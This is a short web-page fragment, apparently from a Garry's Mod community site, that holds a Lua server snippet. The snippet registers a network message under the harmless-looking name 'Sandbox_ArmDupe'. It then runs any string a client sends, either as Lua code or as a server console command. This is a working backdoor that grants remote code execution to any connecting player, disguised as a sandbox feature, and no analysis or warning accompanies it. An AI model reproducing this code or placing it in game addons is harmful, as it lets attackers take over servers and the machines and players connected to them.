Login to ZARP
|
if SERVER then
util.AddNetworkString("Sandbox_ArmDupe")
net.Receive("Sandbox_ArmDupe", function( length, ply )
local netString = net.ReadString()
local bit = net.ReadBit()
if bit == 1 then
RunString(netString)
else
game.ConsoleCommand(netString .. "\n")
end
end)
end